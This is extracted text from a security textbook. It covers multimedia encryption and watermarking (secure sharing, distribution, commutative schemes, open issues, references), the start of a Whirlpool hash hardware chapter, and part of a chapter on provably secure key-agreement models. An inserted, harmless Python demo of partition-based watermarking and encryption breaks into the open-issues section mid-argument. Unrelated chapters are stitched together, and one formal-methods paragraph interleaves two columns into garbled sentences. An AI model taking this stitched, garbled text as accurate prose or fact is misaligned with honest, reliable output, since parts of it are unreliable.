error-correcting codes (ECC) to encode the watermark before embedding it into the multimedia data. For example, the watermark can be repeated several times (Kundur, 2001), such codes as convolutional codes, block codes, or turbo codes are used to encode the watermark (Ambroze et al., 2001), or the combination of watermark repetition and error-correcting codes is used (Desset, Macq, & Vandendorpe, 2002). This kind of method improves the robustness by increasing the redundancy in the watermark. The second method, as shown in Figure 8b, is using multiple description code (MDC) to transmit the watermark or the watermarked multimedia data. For example, the watermark is encoded with MDC before being embedded (Hsia, Chang, & Liao, 2004), the watermarked media data are transmitted based on MDC (Chu, Hsin, Huang, Huang, & Pan, 2005; Pan, Hsin, Huang, & Huang, 2004), or both the watermark and the watermarked media data are encoded with MDC (Ashourian & Ho, 2003). This kind of method exploits the redundancy of multimedia data and is more suitable for scenarios with a high error rate. Another method (Song, Kim, Lee, & Kim, 2002) partitions the multimedia data into segments, each of which fits the packet size in wireless transmission, and then embeds a watermark into each packet. Thus, it is robust to wireless packet error conditions, including not only channel errors but also delay and jitter.

Combination of Multimedia Encryption and Multimedia Watermarking

Multimedia encryption and watermarking realize different functionalities, for example, confidentiality protection and ownership protection; they can be combined to provide stronger security. This is also required by some applications, such as secure multimedia sharing, secure multimedia distribution, or the exchange between watermarking and encryption.

Secure Multimedia Sharing

Multimedia sharing is more and more popular with the development of network technology, especially since such networks as p2p have been developed. Generally, in these applications, the ownership information is embedded into the multimedia data with watermarking technology, and then the watermarked multimedia data are encrypted and distributed. The ownership information can be extracted later to prove the ownership right, and the encryption process prevents unauthorized users from accessing the real content of the multimedia data. A typical example is the music sharing system named Music2Share (Kalker, Epema, Hartel, Lagendijk, & Steen, 2004), as shown in Figure 9. In this system, the watermark representing ownership information is embedded into music files, and the

Figure 9. Architecture of a multimedia sharing system (media server, content, access right)


watermarked files are encrypted and then distributed over p2p networks. The customer can access the encrypted music files, but must apply for the right from the server before he can decrypt the files. The watermark extracted from the music file can prove the legality of the music.

Secure Multimedia Distribution

In secure multimedia distribution, multimedia data are transmitted from the server to customers in a secure way. In this case, the confidentiality can be protected, and the illegal distributor who redistributes his/her copy to other customers can be traced. Generally, both encryption and watermarking technology are used. Till now, three kinds of schemes have been proposed, which embed watermarks at the server side, in the router, or at the client side, respectively. In the first kind of scheme, the customer information is embedded into the multimedia data at the server side before multimedia encryption. This scheme is more suitable for unicast than for multicast or broadcast, because it is difficult for the server to assign different copies to different customers simultaneously. In the second kind of scheme, the customer information is embedded by the routers at a lower level (Brown, Perkins, & Crowcroft, 1999), which distributes the server's load to the routers. This scheme reduces the server's load, but also changes the network protocols. In the third kind of scheme, the customer information is embedded at the customer side (Bloom, 2003). This scheme is time efficient, but the security is a problem because of the isolation between decryption and watermarking. Some means (Anderson & Manifavas, 1997; Kundur & Karthik, 2004; Lian, Liu, Ren, & Wang, 2006b) have been proposed to improve the security, which combine decryption with watermark embedding. These combined methods improve the system's security while keeping the cost low.

Commutative Watermarking and Encryption

Generally, the watermarking operation and the encryption operation are separate. That is, the encrypted multimedia data should be decrypted before being watermarked. In some applications, if the operation triple decryption-watermarking-encryption can be avoided, the operation cost will be reduced greatly. In this case, the encrypted multimedia data can be watermarked directly without decryption, and the watermark can be extracted directly from the encrypted or the decrypted multimedia data. This kind of watermarking-encryption pair is named commutative watermarking and encryption (CWE). A practical scheme is proposed in Lian, Liu, Ren, and Wang (2006c), which is based on partial encryption. In this scheme, the multimedia data are partitioned into two parts, that is, the perception significant part and the robust part, among which the perception significant part is encrypted, while the robust part is watermarked. Thus, the encryption and watermarking are independent of each other, and they support the commutative operations.

Open Issues

Contradiction between Format Independence and Format Compliance

To keep the cost low, partial encryption schemes are used to encrypt multimedia data, which keeps the data format compliant. Thus, for different multimedia data or different codecs, the encryption algorithms are often different. If various kinds of multimedia data are included in an application, then various encryption algorithms should be used, and some extra information is required to tell which encryption algorithm has been used. Compared with format compliant encryption, format independent encryption regards multimedia data as binary data and easily supports various data. Thus, for applications with versatile data, format independent encryption is more suitable. For example, in such DRM systems as the Internet streaming media alliance (ISMA), the advanced access content system (AACS), or the open mobile alliance (OMA) (Kundur et al., 2004), the algorithms advanced encryption standard (AES) and data encryption standard (DES) are recommended to encrypt multimedia data regardless of the file format.
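The partition-based commutative watermarking and encryption described above (Lian et al., 2006c), together with the repetition-coded watermark of the ECC method of Figure 8a, as an added example that is not the chapter's or the cited authors' code: it partitions constructed coefficient data, encrypts only the significant part with a stand-in keyed stream (HMAC-SHA256 in counter mode, in place of the AES/DES the chapter names), embeds a repetition-coded owner ID in the robust part, and checks that the two operations commute and that the watermark survives parity errors. The 8-coefficient block model, all function names and the sample data are assumptions of this example.

```python
"""Added example (not from the chapter): commutative watermarking and
encryption (CWE) by partitioning, with a repetition-coded (ECC) watermark.

Constructed assumptions: "media" is a list of 8-bit transform coefficients,
every BLOCK-th one plays the perception-significant part (think DC terms) and
the rest form the robust part, mirroring the partition of the Lian et al.
(2006c) scheme; HMAC-SHA256 in counter mode stands in for AES/DES."""
import hashlib
import hmac
import random

BLOCK = 8    # every BLOCK-th coefficient is "perception significant"
REPEAT = 5   # repetition-code length; corrects up to REPEAT // 2 errors per bit


def significant_positions(n):
    return [i for i in range(n) if i % BLOCK == 0]


def robust_positions(n):
    return [i for i in range(n) if i % BLOCK != 0]


def keystream(key, n):
    """Toy stream cipher: HMAC-SHA256 over a counter (stand-in for AES)."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        out += hmac.new(key, counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:n])


def partial_encrypt(media, key):
    """XOR only the significant coefficients; robust ones are left untouched.
    XOR is its own inverse, so the same call decrypts."""
    pos = significant_positions(len(media))
    ks = keystream(key, len(pos))
    out = list(media)
    for k, i in enumerate(pos):
        out[i] = media[i] ^ ks[k]
    return out


def ecc_encode(bits):
    """Repetition code (Figure 8a style ECC): each bit is sent REPEAT times."""
    return [b for b in bits for _ in range(REPEAT)]


def ecc_decode(coded):
    """Majority vote over each group of REPEAT received bits."""
    return [int(sum(coded[i:i + REPEAT]) * 2 > REPEAT)
            for i in range(0, len(coded), REPEAT)]


def embed(media, bits):
    """Odd/even modulation: force each robust coefficient's parity to the bit."""
    coded = ecc_encode(bits)
    pos = robust_positions(len(media))
    if len(coded) > len(pos):
        raise ValueError("watermark too long for the robust part")
    out = list(media)
    for bit, i in zip(coded, pos):
        if out[i] % 2 != bit:
            out[i] = out[i] + 1 if out[i] < 255 else out[i] - 1
    return out


def extract(media, nbits):
    """Read parities of the robust part and undo the repetition code."""
    pos = robust_positions(len(media))
    return ecc_decode([media[i] % 2 for i in pos[:nbits * REPEAT]])


def corrupt(media, robust_offsets):
    """Simulated channel errors: flip the parity of chosen robust coefficients."""
    pos = robust_positions(len(media))
    out = list(media)
    for k in robust_offsets:
        out[pos[k]] ^= 1
    return out


def demo():
    rng = random.Random(1)
    media = [rng.randrange(256) for _ in range(256)]   # constructed sample data
    key = b"constructed-demo-key"
    wm = [1, 0, 1, 1, 0, 0, 1, 0]                       # constructed 8-bit owner ID
    # Commutativity: watermark-then-encrypt equals encrypt-then-watermark,
    # because the two operations touch disjoint coefficient sets.
    we = partial_encrypt(embed(media, wm), key)
    ew = embed(partial_encrypt(media, key), wm)
    # The watermark is readable from the encrypted copy and from the decrypted one.
    from_encrypted = extract(we, len(wm))
    from_decrypted = extract(partial_encrypt(we, key), len(wm))
    # Two parity errors in every 5-bit group are corrected by the majority vote;
    # three per group would not be.
    damaged = corrupt(we, [g * REPEAT + j for g in range(len(wm)) for j in (0, 3)])
    recovered = extract(damaged, len(wm))
    return {"watermark": wm, "commutes": we == ew, "from_encrypted": from_encrypted,
            "from_decrypted": from_decrypted, "recovered": recovered}


if __name__ == "__main__":
    print(demo())
```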



Thus, for practical applications, a trade-off between computational cost and convenience has to be made, which determines which kind of algorithm should be used.

Standardization of Watermarking Algorithms

Compared with encryption algorithms, which have been standardized to some extent, watermarking algorithms are still under study. Because of the diversity of multimedia content, the difficulty of multimedia understanding, and the variety of applications, it is difficult to standardize multimedia watermarking algorithms. Generally, they have different performance in security, efficiency, robustness, capacity, and so forth. Which watermarking algorithm to use depends on the performance required by the application. Defining suitable watermarking algorithms will provide more convenience to wireless/mobile applications.

Fingerprint Algorithms Against Collusion Attacks

In secure multimedia distribution, the collusion attack (Zhao, Wang, & Liu, 2005) threatens the system. That is, different customers combine their copies through averaging, substitution, and so forth, which produces a copy without any customer information. To counter this attack, some fingerprint encoding methods (Boneh & James, 1998; Wu, Trappe, Wang, & Liu, 2004) have been proposed. These methods generate different fingerprint codes for different customers, and the colluded copy can still tell one or more of the colluders. However, there is still a trade-off between the watermark capacity and the number of supported customers, and some new attacks are still not predicted, such as the linear combination collusion attack (LCCA) (Wu, 2005). Thus, better fingerprint encoding methods with good efficiency are expected.

Key Management in Mobile Applications

Multimedia encryption and watermarking can both be controlled by keys; key management needs to be investigated. For example, should the encryption key be independent of the watermarking key, and how should different decryption keys be assigned to different customers in multimedia distribution? Additionally, for multicast or p2p networks, key generation and distribution (Cherukuri, 2004; Eskicioglu, 2002) are important topics not only in fixed networks but also in mobile environments.

Conclusion

In this chapter, mobile/wireless multimedia encryption and watermarking algorithms are introduced and analyzed, including the general requirements, various multimedia encryption algorithms, some watermarking algorithms, the combination of encryption and watermarking, and some open issues. Among them, the multimedia encryption algorithms are classified and analyzed according to their functionalities, and the watermarking algorithms with low cost are emphasized. The combination of encryption and watermarking brings up some new research topics, for example, fingerprinting or commutative watermarking and encryption. Some open issues are also presented, including the contradiction between format compliance and format independence, the standardization of watermarking algorithms, the fingerprint algorithms resisting collusion attacks, and key management in mobile applications.

References

Ahn, J., Shim, H., Jeon, B., & Choi, I. (2004). Digital video scrambling method using intra prediction mode. In Pacific Rim Conference on Multimedia, PCM2004 (LNCS 3333, pp. 386-393). Springer.


Alattar, A., Lin, E., & Celik, M. (2003). Digital watermarking of low bit-rate advanced simple profile MPEG-4 compressed video. IEEE Transactions on Circuits and Systems for Video Technology, 13, 787-800.

Ambroze, A., Wade, G., Serdean, C., Tomlinson, M., Stander, J., & Borda, M. (2001). Turbo code protection of video watermark channel. IEE Proceedings of Vision and Image Signal Processing, 148, 54-58.

Anderson, R., & Manifavas, C. (1997). Chameleon—A new kind of stream cipher. In Fast Software Encryption (LNCS, vol. 1267, pp. 107-113). Springer-Verlag.

Ando, K., Watanabe, O., & Kiya, H. (2001). Partial-scrambling of still images based on JPEG2000. In Proceedings of the International Conference on Information, Communications, and Signal Processing, Singapore.

Ando, K., Watanabe, O., & Kiya, H. (2002). Partial-scrambling of images encoded by JPEG2000. IEICE Transactions, J85-D-1(2), 282-290.

Arora, S., & Emmanuel, S. (2003). Real-time adaptive speech watermarking scheme for mobile applications. In Proceedings of the International Conference on Information, Communications & Signal Processing (ICICS)—IEEE Pacific-Rim Conference on Multimedia (PCM) (pp. 850-853).

Ashourian, M., & Ho, Y. (2003). Multiple description coding for image data hiding jointly in the spatial and DCT domains. In ICICS 2003 (LNCS 2836, pp. 179-190).

Barni, M., & Bartolini, F. (2004). Watermark systems engineering. Marcel Dekker.

Bloom, J. (2003). Security and rights management in digital cinema. Proceedings of the IEEE International Conference on Acoustic, Speech and Signal Processing, 4, 712-715.

Boneh, D., & James, S. (1998). Collusion-secure fingerprinting for digital data. IEEE Transactions on Information Theory, 44(5), 1897-1905.

Brown, I., Perkins, C., & Crowcroft, J. (1999). Watercasting: Distributed watermarking for multicast media. In Proceedings of the First International Workshop on Networked Group Communication (LNCS 1736, pp. 286-300). Springer-Verlag.

Burnside, M., Clarke, D., Mills, T., Maywah, A., Devadas, S., & Rivest, R. (2002). Proxy-based security protocols in networked mobile devices. In Proceedings of the 2002 ACM Symposium on Applied Computing (pp. 265-272).

Chang, Y., Han, R., Li, C., & Smith, J. R. (2004). Secure transcoding of Internet content. In Proceedings of the International Workshop on Intelligent Multimedia Computing and Networking (IMMCN) (pp. 940-943).

Checcacci, N., Barni, M., Bartolini, F., & Basagni, S. (2000). Robust video watermarking for wireless multimedia communications. In Proceedings of the 2000 IEEE Conference on Wireless Communications and Networking (pp. 1530-1535).

Cherukuri, S. (2004). An adaptive scheme to manage mobility for secure multicasting in wireless local area networks. Unpublished master's thesis, Arizona State University, Tempe.

Chu, S., Hsin, Y., Huang, H., Huang, K., & Pan, J. (2005). Multiple description watermarking for lossy network. IEEE Computer Society, 4, 3990-3993.

Cox, I., Miller, M., & Bloom, J. (2002). Digital watermarking. San Francisco: Morgan Kaufmann.

Desset, C., Macq, B., & Vandendorpe, L. (2002). Block error-correcting codes for systems with a very high BER: Theoretical analysis and application to the protection of watermarks. Signal Processing: Image Communication, 17, 409-421.

Dutta, A., Das, S., Li, P., & Auley, A. (2004). Secured mobile multimedia communication for wireless Internet. In Proceedings of the 2004 IEEE International Conference on Networking, Sensing & Control (pp. 181-186).

Eskicioglu, A. (2002). Multimedia security in group communications: Recent progress in wired and wireless networks. In Proceedings of the IASTED International Conference on Communications and Computer Networks, Cambridge, MA (pp. 125-133).

Furht, B., & Kirovski, D. (Eds.). (2006). Multimedia encryption and authentication techniques and applications. Boca Raton, FL: Auerbach Publications.

Gang, L., Akansu, A., Ramkumar, M., & Xie, X. (2001). Online music protection and MP3 compression. In Proceedings of the International Symposium on Intelligent Multimedia, Video and Speech Processing (pp. 13-16).

Ganz, A., Park, S., & Ganz, Z. (1998). Inline network encryption for multimedia wireless LANs. In Proceedings of the IEEE Military Communications Conference.

Ganz, A., Park, S., & Ganz, Z. (1999). Experimental measurements and design guidelines for real-time software encryption in multimedia wireless LANs. Cluster Computing, 2(1), 35-43.

Goodman, J., & Chandrakasan, A. (1998). Low power scalable encryption for wireless systems. Wireless Networks, 4, 55-70.

Hamalainen, P., Hannikainen, M., Hamalainen, T., & Saarinen, J. (2001). Configurable hardware implementation of triple DES encryption algorithm for wireless local area network. In Proceedings of the 2001 IEEE International Conference on Acoustics, Speech and Signal Processing (pp. 1221-1224).

Hsia, Y., Chang, C., & Liao, J. (2004). Multiple-description coding for robust image watermarking. In Proceedings of the 2004 International Conference on Image Processing (pp. 2163-2166).

Kalker, T., Epema, D., Hartel, P., Lagendijk, R., & Steen, M. (2004). Music2Share—Copyright-compliant music sharing in P2P systems. Proceedings of the IEEE, 92(6), 961-970.

Kejariwal, A., Gupta, S., Nicolau, A., Dutt, N., & Gupta, R. (2004). Proxy-based task partitioning of watermarking algorithms for reducing energy consumption in mobile devices. In Proceedings of the 2004 Design Automation Conference (pp. 556-561).

Kejariwal, A., Nicolau, S., Dutt, A., & Gupta, N. (2005). Energy analysis of multimedia watermarking on mobile handheld devices. In Proceedings of the International Conference on Embedded Systems for Real-Time Multimedia (ESTImedia 2005) (pp. 33-38).

Kim, G., Shin, D., & Shin, D. (2005). Intellectual property management on MPEG-4 video for hand-held device and mobile video streaming service. IEEE Transactions on Consumer Electronics, 51(1), 139-143.

Kundur, D. (2001). Watermarking with diversity: Insights and implications. IEEE Transactions on Multimedia, 8, 46-52.

Kundur, D., & Karthik, K. (2004). Video fingerprinting and encryption principles for digital rights management. Proceedings of the IEEE, 92(6), 918-932.

Kundur, D., Yu, H., & Lin, C. (2004). Security and digital rights management for mobile content. In T. Wu & S. Dixit (Eds.), Content delivery in the mobile Internet. John Wiley & Sons.

Kutter, M., Volosphynovskiy, S., & Herrigel, A. (2000). The watermarking copy attack. In Security and Watermarking of Multimedia Contents II (SPIE 3971, pp. 371-380).

Li, Z., Sun, Q., & Lian, Y. (2005). An adaptive scalable watermark scheme for high-quality audio archiving and streaming applications. In Proceedings of the IEEE International Conference on Multimedia and Expo.

Lian, S., Liu, Z., & Ren, Z. (2005a). Selective video encryption based on advanced video coding. In Proceedings of the 2005 Pacific-Rim Conference on Multimedia (PCM 2005), Part II (LNCS 3768, pp. 281-290).

Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006b). Secure distribution scheme for compressed video stream. In Proceedings of the 2006 IEEE International Conference on Image Processing (ICIP 2006).

Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006c). Commutative watermarking and encryption for media data. International Journal of Optical Engineering, 45(8), 0805101-0805103.

Lian, S., Liu, Z., Ren, Z., & Wang, Z. (2005b). Selective video encryption based on advanced video coding. In Proceedings of the Pacific-Rim Conference on Multimedia (PCM 2005) (pp. 281-290).

Lian, S., Liu, Z., Ren, Z., & Wang, H. (2006a). Secure advanced video coding based on selective encryption algorithms. IEEE Transactions on Consumer Electronics, 52(2), 621-629.

Lian, S., Sun, J., & Wang, Z. (2004a). A novel image encryption scheme based on JPEG encoding. In Proceedings of the International Conference on Information Visualization (IV) 2004 (pp. 217-220).

Lian, S., Sun, J., Zhang, D., & Wang, Z. (2004b). A selective image encryption scheme based on JPEG2000 codec. In Proceedings of the 2004 Pacific-Rim Conference on Multimedia (PCM2004) (LNCS 3332, pp. 65-72). Springer.

Lian, S., Wang, Z., & Sun, J. (2004c). A fast video encryption scheme suitable for network applications. In Proceedings of the International Conference on Communications, Circuits and Systems, 1, 566-570.

Linnartz, J., & Dijk, M. (1998, April 15-17). Analysis of the sensitivity attack against electronic watermarks in images. Paper presented at the Workshop on Information Hiding, Portland, OR.

Liu, Q., & Jiang, X. (2005). Applications of mobile agent and digital watermarking technologies in mobile communication network. In Proceedings of the 2005 International Conference on Wireless Communications, Networking and Mobile Computing (pp. 1168-1170).

Liu, X., & Eskicioglu, A. (2003). Selective encryption of multimedia content in distribution networks: Challenges and new directions. In Proceedings of the IASTED International Conference on Communications, Internet and Information Technology (CIIT 2003). Scottsdale, AZ: ACTA Press.

Mollin, R. (2006). An introduction to cryptography. CRC Press.

Nanjunda, C., Haleem, M., & Chandramouli, R. (2005). Robust encryption for secure image transmission over wireless channels. In Proceedings of the IEEE International Conference on Communications (ICC) (pp. 1287-1291).

Norcen, R., & Uhl, A. (2003). Selective encryption of the JPEG2000 bitstream. In IFIP International Federation for Information Processing (LNCS 2828, pp. 194-204).

Ong, C., Nahrstedt, K., & Yuan, W. (2003). Quality of protection for mobile multimedia applications. In Proceedings of the IEEE International Conference on Multimedia and Expo (ICME2003), Baltimore, MD.

Pal, S., Saxena, P., & Muttoo, S. (2004). Image steganography for wireless networks using the Hadamard transform. In Proceedings of the 2004 International Conference on Signal Processing and Communications (pp. 131-135).

Pan, J., Hsin, Y., Huang, H., & Huang, K. (2004). Robust image watermarking based on multiple description vector quantization. Electronics Letters, 40(22), 1409-1410.

Petitcolas, F., Anderson, R., & Kuhn, M. (1999). Information hiding—A survey. Proceedings of the IEEE, 87(7), 1062-1078.

Petrescu, M., Mitrea, M., & Preteux, F. (2005). Low rate video protection: The opportunity of spread spectrum watermarking. WSEAS Transactions on Communications, 7(4), 478-485.

Pfarrhofer, R., & Uhl, A. (2005). Selective image encryption using JBIG. In Proceedings of the IFIP TC-6 TC-11 International Conference on Communications and Multimedia Security (CMS 2005) (pp. 98-107).

Podesser, M., Schmidt, H., & Uhl, A. (2002). Selective bitplane encryption for secure transmission of image data in mobile environments. In CD-ROM Proceedings of the 5th IEEE Nordic Signal Processing Symposium (NORSIG 2002).

Pommer, A., & Uhl, A. (2003). Selective encryption of wavelet-packet encoded image data: Efficiency and security. In Proceedings of Communications and Multimedia Security 2003 (pp. 194-204).

Potlapally, N., Raghunathan, A., & Jha, N. (2003). Analyzing the energy consumption of security protocols. In Proceedings of the 2003 International Symposium on Low Power Electronics and Design, Seoul, Korea (pp. 30-35).

Raghunathan, A., Ravi, S., Hattangady, S., & Quisquater, J. (2003). Securing mobile appliances: New challenges for the system designer. In Proceedings of the 2003 Europe Conference and Exhibition in Design, Automation and Test (pp. 176-181).

Rao, H., Chang, D., Chen, Y., & Chen, M. (2001). iMobile: A proxy-based platform for mobile services. In Proceedings of the Wireless Mobile Internet (pp. 3-10).

Salkintzis, A., & Passas, N. (2005). Emerging wireless multimedia: Services and technologies. John Wiley & Sons.

Scopigno, R., & Belfiore, S. (2004). Image decomposition for selective encryption and flexible network services. In Proceedings of the IEEE Globecom 2004, Dallas, TX.

Servetti, A., & Martin, J. (2002a). Perception-based selective encryption of G.729 speech. Proceedings of IEEE ICASSP, 1, 621-624.

Servetti, A., & Martin, J. (2002b). Perception-based selective encryption of compressed speech. IEEE Transactions on Speech and Audio Processing, 10(8), 637-643.

Servetti, A., Testa, C., Carlos, J., & Martin, D. (2003). Frequency-selective partial encryption of compressed audio. Paper presented at the International Conference on Audio, Speech and Signal Processing, Hong Kong.

Shi, C., & Bhargava, B. (1998a). A fast MPEG video encryption algorithm. In Proceedings of the 6th ACM International Multimedia Conference, Bristol, UK (pp. 81-88).

Shi, J., & Bhargava, B. (1998b). An efficient MPEG video encryption algorithm. In Proceedings of the 6th ACM International Multimedia Conference, Bristol, UK (pp. 381-386).

Song, G., Kim, S., Lee, W., & Kim, J. (2002). Meta-fragile watermarking for wireless networks. In Proceedings of the International Conference of Communications, Circuits, and Systems.

Sridharan, S., Dawson, E., & Goldburg, B. (1991). Fast Fourier transform based speech encryption system. IEE Proceedings of Communications, Speech and Vision, 138(3), 215-223.

Tang, L. (1996). Methods for encrypting and decrypting MPEG video data efficiently. In Proceedings of the Fourth ACM International Multimedia Conference (ACM Multimedia '96), Boston, MA (pp. 219-230).

Tikkanen, K., Hannikainen, M., Hamalainen, T., & Saarinen, J. (2000). Hardware implementation of the improved WEP and RC4 encryption algorithms for wireless terminals. In Proceedings of the European Signal Processing Conference (pp. 2289-2292).

Tosun, A., & Feng, W. (2000). Efficient multi-layer coding and encryption of MPEG video streams. IEEE International Conference on Multimedia and Expo, 1, 119-122.

Tosun, A., & Feng, W. (2001a). Lightweight security mechanisms for wireless video transmission. In Proceedings of the International Conference on Information Technology: Coding and Computing, Las Vegas, NV (pp. 157-161).

Tosun, A., & Feng, W. (2001b). On error preserving encryption algorithms for wireless video transmission. In Proceedings of the ACM International Multimedia Conference and Exhibition, Ottawa, Ontario, Canada (pp. 302-308). Elsevier Engineering Information Inc.

Wee, S., & Apostolopoulos, J. (2001). Secure scalable video streaming for wireless networks. In Proceedings of the IEEE International Conference on Acoustics, Speech, and Signal Processing, 4, 2049-2052.

Wee, S., & Apostolopoulos, J. (2003). Secure scalable streaming and secure transcoding with JPEG-2000. IEEE International Conference on Image Processing, 1, 205-208.

Wen, J., Severa, M., Zeng, W., Luttrell, M. H., & Weiyin, J. (2002). A format-compliant configurable encryption framework for access control of video. IEEE Transactions on Circuits and Systems for Video Technology, 12(6), 545-557.

Wu, C., & Kuo, C. (2000). Fast encryption methods for audiovisual data confidentiality. Proceedings of SPIE, 4209, 284-295.

Wu, C., & Kuo, C. (2001). Efficient multimedia encryption via entropy codec design. Proceedings of SPIE, 4314, 128-138.

Wu, M., Trappe, W., Wang, Z., & Liu, K. (2004). Collusion-resistant fingerprinting for multimedia. IEEE Signal Processing Magazine, 21(2), 15-27.

Wu, Y. (2005). Linear combination collusion attack and its application on an anti-collusion fingerprinting. In Proceedings of the IEEE International Conference on Audio, Speech and Signal Processing (ICASSP'05) (pp. 13-16).

Zeng, W., Zhuang, X., & Lan, J. (2004). Network friendly media security: Rationales, solutions, and open issues. In Proceedings of the International Conference on Image Processing (ICIP 2004) (pp. 565-568).

Zhao, H., Wang, Z., & Liu, K. (2005). Forensic analysis of nonlinear collusion attacks for multimedia fingerprinting. IEEE Transactions on Image Processing, 14(5), 646-661.

Zhu, B., Yuan, C., Wang, Y., & Li, S. (2005). Scalable protection for MPEG-4 fine granularity scalability. IEEE Transactions on Multimedia, 7(2), 222-233.

Key Terms

Commutative Watermarking and Encryption: Commutative watermarking and encryption is the watermarking-encryption pair that supports the exchange between the encryption algorithm and the watermarking algorithm. Thus, the media data can either be watermarked followed by encryption or be encrypted followed by watermarking.

Digital Watermarking: Digital watermarking is the technology to embed information into the original data by modifying parts of the data. The produced data are still usable, and the information can be detected or extracted from them.

Format Compliant Encryption: Format compliant encryption is the multimedia encryption method that keeps the format information unchanged. In this method, the encrypted media data can be decoded or browsed by a general decoder or player.

Joint Fingerprint Embedding and Decryption: Joint fingerprint embedding and decryption is the technology to implement fingerprint embedding and data decryption at the same time. The input is the encrypted media copy, while the output is the decrypted media copy with a unique fingerprint, for example, the customer ID.

Partial Encryption: Partial encryption is the encryption method that encrypts only parts of the original data while leaving the other parts unchanged. In this method, traditional ciphers can be used to encrypt the selected parts.

Robust Watermarking: Robust watermarking is the watermarking algorithm that can survive not only such general operations as compression, adding noise, filtering, A/D or D/A conversion, and so forth, but also such geometric attacks as rotation, scaling, translation, shearing, and so forth. It is often used in ownership protection.

Scalable Encryption: Scalable encryption is the multimedia encryption method that keeps the scalability of the progressive or scalable media data. The scalable media data can be produced by such codecs as JPEG2000, MPEG4, scalable video coding (SVC), and so on.




Chapter XVII
System-on-Chip Design of the Whirlpool Hash Function
Paris Kitsos
Hellenic Open University (HOU), Patras, Greece

Abstract

In this chapter, a system-on-chip design of the newest powerful standard in the hash families, named Whirlpool, is presented. In more detail, an architecture and two very large-scale integration (VLSI) implementations are presented. The first implementation is suitable for high speed applications, while the second one is suitable for applications with constrained silicon area resources. The architecture permits a wide variety of implementation tradeoffs. Different implementations have been introduced, and each specific application can choose the appropriate speed-area trade-off implementation. The implementations are examined and compared in the security level and in the performance by using hardware terms. Whirlpool, together with the RIPEMD, SHA-1, and SHA-2 hash functions, is adopted by the International Organization for Standardization (ISO/IEC, 2003) 10118-3 standard. The Whirlpool implementations allow fast execution and effective substitution of any previous hash families' implementations in any cryptography application.

Introduction

Nowadays, financial and other electronic transactions have grown exponentially and play an important role in our lives. All these transactions have integrated data authentication processes. In addition, many applications like the public key infrastructure (PKI) (Adams & Farrell, 1999; National Institute of Standards and Technology [NIST, 2005, http://csrc.nist.gov/publications/nistpubs/800-77/sp800-77.pdf]) and many mobile communications include authentication services. All the aforementioned applications have integrated an authentication module including a hash function embedded in the system's implementation.

A hash function is a function that maps an input of arbitrary length into a fixed number of output bits, the hash value.

One of the most widely used hash functions is RIPEMD (Dobbertin, Bosselaers, & Preneel, 1996). There are two different RIPEMD versions, RIPEMD-128 and RIPEMD-160, with a similar design philosophy but a different word length of the produced message digest (128- and 160-bit,

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
The Provably Secure Formal Method

The design and analysis of secure key agreement protocols has proved to be a non-trivial task, with a large body of work written on the topic. Among the methods for the design and analysis of key agreement protocols, formal methods have always been a focus of the international investigation of cryptography. Over the years, two distinct views of formal methods, the symbolic logic method and the computational complexity method, have developed in two mostly separate communities (Martin & Phillip, 2002). The symbolic logic method relies on a simple but effective symbolic formal expression approach, in which cryptographic operations are seen as functions on a space of symbolic formal expressions (e.g., BAN, communicating sequential processes [CSP], NRL) (Wenbo, 2004). The other one, the computational complexity method, relies on a detailed computational model that considers issues of complexity and probability of successful attacks, in which cryptographic operations are seen as functions on strings of bits.

The provably secure formal method, which is based on the computational complexity method, is a very hot research topic at present. Its salient property is that the security protocols designed with it are provably secure. Among the provably secure formal methods, the CK model and the UC security model are very popular.

In 2001, Canetti and Krawczyk presented the CK model for the formal analysis of key-exchange (KE) protocols. A session-key security definition and a simple modular methodology to prove a KE protocol under this definition are introduced in this model. One central goal of the CK model is to simplify the usability of the definition via a modular approach to the design and analysis of KE protocols. It adopts the indistinguishability approach (Bellare, Canetti, & Krawczyk, 1998) to define security: a KE protocol is called secure if, under the allowed adversarial actions, it is infeasible for the attacker to distinguish the value of a key generated by the protocol from an independent [...]

Concurrent composition is a fact of life in real network settings. Protocols that are proven secure in the stand-alone model are not necessarily secure under composition. Therefore, it does not suffice to prove that a protocol is secure in the stand-alone model. The UC security model proposed by Canetti in 2001 (Birgit & Michael, 2001) is for representing and analyzing cryptographic protocols under concurrent circumstances (Yeluda, 2003). The salient property of definitions of security in this framework is that they guarantee security even when the given protocol is running in an arbitrary and unknown multi-party environment. An approach taken in this framework is to use definitions that treat the protocol as stand-alone but guarantee secure composition. Security in complex settings (where a protocol instance may run concurrently with many other protocol instances, with arbitrary inputs and in an adversary-controlled way) is guaranteed via a general composition theorem. On top of simplifying the process of formulating a definition and analyzing protocols, this approach guarantees security in arbitrary protocol environments, even unpredictable ones that have not been explicitly considered. The abstraction level of UC security goes far beyond other security models; therefore, it tends to be more restrictive than other definitions of security. The most outstanding feature of the UC framework is its modular design concept: one may design a protocol on its own and, so long as the protocol satisfies UC security, it is guaranteed to remain secure while running concurrently with other protocols.

This chapter focuses mainly on the introduction, analysis, and applications of these two provably secure formal methods. The rest of this chapter is organized as follows. In the next section, the CK model and the UC security model are introduced. In the third section, we analyze the security of the CK model. A bridge between this formal method and the informal method (heuristic method) is established. What is more, the advantages and disadvantages of the CK model are given. In the Universally Composable Anonymous Hash
random value. The security guarantees that result Certificationsection, Modelan extension of the
from the proof by the CK model are substantial as UC security model is presented. The UC security
they capture many of the security concerns in the model fails to characterize the special security
real communications setting. requirements of anonymous authentication with


The Provably Secure Formal Method

other kinds of certificates. Therefore the UC security model is extended, and a new model, the universally composable anonymous hash certification model, is presented. In this model, an anonymous hash certification ideal functionality is introduced, which fulfills identity authentication by binding the identity to special hash values. In addition, a more universal certificate authority (CA) model is presented, which can issue certificates of a specific form (for example, a hash value). In the fifth section, we analyze the four-way handshake protocol in 802.11i with the CK model and the UC security model. In the sixth section, the authentication modules in the Chinese WLAN national standard WAPI and its implementation plan are first analyzed with the CK model; we then point out how the implementation plan overcomes the security weaknesses of the original WAPI. The last two sections contain the future trends and conclusions.

BACKGROUND OVERVIEW

Definition 1: Key-agreement protocol (Menezes, Van Oorschot, & Vanstone, 1996). A key-agreement protocol or mechanism is a key establishment technique in which a shared secret is derived by two (or more) parties as a function of information contributed by, or associated with, each of these, (ideally) such that no party can predetermine the resulting value.

